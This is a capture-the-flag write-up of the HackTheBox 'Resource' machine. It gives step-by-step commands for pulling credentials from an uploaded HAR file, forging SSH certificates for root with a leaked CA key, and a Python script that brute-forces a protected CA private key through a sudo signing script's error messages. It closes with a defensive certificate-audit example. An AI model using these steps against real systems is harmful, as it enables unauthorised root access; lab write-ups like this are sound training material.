HackTheBox Resource Writeup
Explore the fundamentals of cybersecurity in the Resource Capture The Flag (CTF) challenge, a hard-level box! This straightforward CTF writeup walks through the key steps clearly and simply, making it accessible to players at this level.
Add Hosts
10.10.11.27 ssg.htb itrc.ssg.htb
Script to add hosts automatically
ip="10.10.11.27"
domain="ssg.htb itrc.ssg.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV itrc.ssg.htb
Nmap scan report for itrc.ssg.htb (10.10.11.27)
Host is up (0.052s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_ 256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Foothold
Copy the PHPSESSID cookie value:
curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -b 'PHPSESSID=<value>' -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
grep -oP 'user=[^&]+&pass=[^"]+' itrc.ssg.htb.har
rm -rf c2f4813259cc57fab36b311c5058cf031cb6eb51.zip itrc.ssg.htb.har
ssh msainristil@itrc.ssg.htb
CA Cert Authority
cd decommission_old_ca/
ssh-keygen -t rsa -b 2048 -f keypair
ssh-keygen -s ca-itrc -I user-cert -n root -V +52w -z 12345 keypair.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair root@localhost
cat /home/zzinter/user.txt
exit
Now for zzinter
cd decommission_old_ca/
ssh-keygen -t rsa -C zzinter@ssg.htb -f users_key
ssh-keygen -s ca-itrc -n zzinter -I ident users_key.pub
On your local PC:
scp msainristil@itrc.ssg.htb:'/home/msainristil/decommission_old_ca/user***' .
ssh -i users_key zzinter@ssg.htb
To move from zzinter@itrc to the Docker host:
cp sign_key_api.sh sign.sh
chmod +x sign.sh
sed -i 's/supported_principals="webserver,analytics,support,security"/supported_principals="webserver,analytics,support,security,zzinter_temp"/' sign.sh
rm -f keypair*
ssh-keygen -f keypair
./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p 2222
172.223.0.1 was identified through a ping sweep and port scan.
Now for root
nano exploit.py
#!/usr/bin/env python3
import subprocess
import string
import sys

def run_signing_command(pattern):
    # Write the candidate pattern to the file passed as the CA key argument
    with open('/tmp/ca-test', 'w') as f:
        f.write(pattern)
    result = subprocess.run(
        ['sudo', '/opt/sign_key.sh', '/tmp/ca-test', 'root.pub', 'root', 'root_user', 'ABCD'],
        capture_output=True, text=True)
    return result.stdout.strip(), result.stderr.strip()

def brute_force_patterns():
    # Extend the recovered prefix one character at a time; the script's error
    # message tells us whether "<prefix><char>*" matched the protected CA key
    chars = string.ascii_letters + string.digits + '-+=/ \r\n'
    base_pattern = ''
    while True:
        found = False
        for char in chars:
            pattern = base_pattern + char + '*'
            stdout, _ = run_signing_command(pattern)
            if "Error: Use API for signing with this CA." in stdout:
                base_pattern += char
                print(base_pattern)
                found = True
                break
        if not found:
            break
    return base_pattern

if __name__ == '__main__':
    ca_key = brute_force_patterns()
    if "-----END OPENSSH PRIVATE KEY-----" in ca_key:
        with open("ca-it", "w") as file:
            file.write(ca_key)
        print("\n\nSuccess\n")
    else:
        sys.exit("\n\nFail\n")
python exploit.py
Now, on your local PC, save the recovered key and use it:
nano pwn.key
chmod 600 pwn.key
yes | ssh-keygen -f root
ssh-keygen -s pwn.key -z 200 -I root -V -10w:forever -n root_user root.pub
ssh root@itrc.ssg.htb -p 2222 -i root -i root-cert.pub
cat /root/root.txt
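The certificates signed in this writeup never expire (-V -10w:forever) or name privileged principals such as root, which is exactly what a CA operator should be auditing for. The following is an added example, not code from the box or the writeup: it constructs an unsigned ssh-ed25519-cert-v01 blob inline (zeroed keys, dummy signature, no signature verification), parses the policy-relevant fields, and flags certificates that violate an assumed policy (expiry required, at most 52 weeks, no direct root principal).

```python
import struct
FOREVER = 0xFFFFFFFFFFFFFFFF  # valid_before that ssh-keygen writes for "forever"

def _s(b):  # SSH wire "string": uint32 big-endian length followed by the bytes
    return struct.pack(">I", len(b)) + b
def build_cert(key_id, principals, valid_after, valid_before, serial):
    # Constructed, unsigned ssh-ed25519-cert-v01 blob: zeroed keys, dummy signature
    prin = b"".join(_s(p.encode()) for p in principals)
    return (_s(b"ssh-ed25519-cert-v01@openssh.com") + _s(b"\x00" * 32)  # type, nonce
            + _s(b"\x00" * 32) + struct.pack(">QI", serial, 1)  # subject key, serial, user type
            + _s(key_id.encode()) + _s(prin)                    # key id, principals
            + struct.pack(">QQ", valid_after, valid_before)     # validity window
            + _s(b"") + _s(b"") + _s(b"")                       # options, extensions, reserved
            + _s(_s(b"ssh-ed25519") + _s(b"\x00" * 32))         # CA (signature) key
            + _s(b"dummy-signature"))

class _Reader:
    def __init__(self, buf):
        self.buf, self.pos = buf, 0
    def take(self, fmt):  # fixed-width fields
        self.pos += struct.calcsize(fmt)
        return struct.unpack_from(fmt, self.buf, self.pos - struct.calcsize(fmt))
    def string(self):  # length-prefixed field
        n = self.take(">I")[0]
        self.pos += n
        return self.buf[self.pos - n:self.pos]

def parse_cert(blob):
    # Policy-relevant fields only; the CA signature is not verified here
    r = _Reader(blob)
    ctype, _nonce, _pk = r.string(), r.string(), r.string()
    serial, _ = r.take(">QI")
    key_id = r.string().decode()
    pr, principals = _Reader(r.string()), []
    while pr.pos < len(pr.buf):
        principals.append(pr.string().decode())
    valid_after, valid_before = r.take(">QQ")
    return {"type": ctype.decode(), "serial": serial, "key_id": key_id,
            "principals": principals, "valid_after": valid_after, "valid_before": valid_before}

def audit(cert, max_lifetime=52 * 7 * 86400, forbidden=("root",)):
    # Assumed policy: expiry required, at most 52 weeks, no direct root principal
    findings = []
    if cert["valid_before"] == FOREVER:
        findings.append("no expiry")
    elif cert["valid_before"] - cert["valid_after"] > max_lifetime:
        findings.append("lifetime exceeds policy")
    findings += [f"forbidden principal {p}" for p in cert["principals"] if p in forbidden]
    return findings
```

On a real CA the same fields can be read from issued certificates with ssh-keygen -L, so this check can run over a signing log or a directory of issued certs.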